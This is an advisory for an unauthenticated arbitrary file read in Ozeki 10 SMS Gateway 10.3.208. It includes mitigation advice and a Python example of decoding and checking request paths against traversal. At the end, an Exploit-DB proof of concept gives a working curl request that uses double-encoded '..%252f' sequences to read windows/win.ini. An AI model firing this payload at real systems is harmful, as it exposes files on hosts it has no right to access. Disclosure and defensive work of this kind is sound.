Vendor: Ozeki 10 SMS Gateway
By: Ahmet Ümit BAYRAM
CVSS: 5.5 (MEDIUM)
Vulnerability: Arbitrary File Read
CWE: 22
Product Name: Ozeki 10 SMS Gateway
Affected Version From: 10.3.0208
Affected Version To: 10.3.0208
Patch Exists: NO
CPE: a:ozeki:ozeki_10_sms_gateway:10.3.208
Platforms Tested: Windows 10
2023

Ozeki 10 SMS Gateway 10.3.208 – Arbitrary File Read (Unauthenticated)

This exploit allows an unauthenticated attacker to read arbitrary files on the target system. The request path carries double URL-encoded traversal sequences (..%252f), which let the attacker traverse directories and access files that should be restricted.

Mitigation:

The vendor should implement proper input validation and access control to prevent directory traversal attacks. Users are advised to update to the latest version of the software.
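
One way to implement the input validation described above, as an added example that is not Ozeki's code or part of the original advisory: percent-decode the request path until it is stable, reject nested encoding and parent-directory segments, then confirm the resolved file stays under the web root. The function names, the decode limit, the web root /srv/www-example and the sample paths are assumptions constructed for illustration.

```python
from pathlib import Path
from urllib.parse import unquote

MAX_DECODE_ROUNDS = 3  # assumption: deeper nesting is rejected outright


def fully_decode(raw_path: str) -> tuple[str, int]:
    """Percent-decode until stable; return (decoded, rounds that changed it)."""
    current = raw_path
    for rounds in range(MAX_DECODE_ROUNDS):
        decoded = unquote(current)
        if decoded == current:
            return current, rounds
        current = decoded
    raise ValueError("path still percent-encoded after decode limit")


def safe_relative_path(raw_path: str) -> str:
    """Return the normalised path relative to the web root, or raise ValueError."""
    decoded, rounds = fully_decode(raw_path)
    if rounds > 1:
        # %252f -> %2f -> / : nested encoding hides separators from naive filters
        raise ValueError("nested percent-encoding in path")
    unified = decoded.replace("\\", "/")  # Windows accepts both separators
    if "\x00" in unified or ":" in unified:
        raise ValueError("NUL byte or drive/stream separator in path")
    segments = [s for s in unified.split("/") if s not in ("", ".")]
    if ".." in segments:
        raise ValueError("parent-directory segment in path")
    return "/".join(segments)


def resolve_under_root(web_root: str, raw_path: str) -> Path:
    """Map a request path to a file and verify it stays inside web_root."""
    root = Path(web_root).resolve()
    target = (root / safe_relative_path(raw_path)).resolve()  # follows symlinks
    if target != root and root not in target.parents:
        raise ValueError("resolved path escapes web root")
    return target


# Constructed sample request paths (not captured traffic)
SAMPLES = ["/index.html", "/..%2f..%2fwindows/win.ini", "/..%252f..%252fwindows/win.ini"]

if __name__ == "__main__":
    for sample in SAMPLES:
        try:
            print(sample, "->", resolve_under_root("/srv/www-example", sample))
        except ValueError as err:
            print(sample, "-> rejected:", err)
```

The final containment check is defence in depth: it still catches an escape through a symlink inside the web root, which the string checks cannot see.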

Exploit-DB raw data:

# Exploit Title: Ozeki 10 SMS Gateway 10.3.208 - Arbitrary File Read (Unauthenticated)
# Date: 01.08.2023
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://ozeki-sms-gateway.com
# Software Link: https://ozeki-sms-gateway.com/attachments/702/installwindows_1689352737_OzekiSMSGateway_10.3.208.zip
# Version: 10.3.208
# Tested on: Windows 10



##################################### Arbitrary File Read PoC #####################################

curl https://localhost:9515/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini

##################################### Arbitrary File Read PoC #####################################